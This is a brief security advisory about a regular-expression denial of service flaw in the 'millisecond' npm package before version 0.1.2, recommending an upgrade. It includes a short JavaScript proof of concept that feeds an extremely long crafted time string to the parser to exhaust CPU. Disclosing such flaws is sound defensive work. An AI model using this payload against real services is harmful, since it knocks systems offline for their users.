Versions of "millisecond" prior to 0.1.2 are affected by a regular expression denial of service vulnerability when extremely long version strings are parsed. Proof of concept var ms = require('millisecond'); var genstr = function (len, chr) { var result = ""; for (i=0; i<=len; i++) { result = result + chr; } return result; } ms(genstr(process.argv[2], "5") + " minutea"); Recommendation Update to version 0.1.2 or later.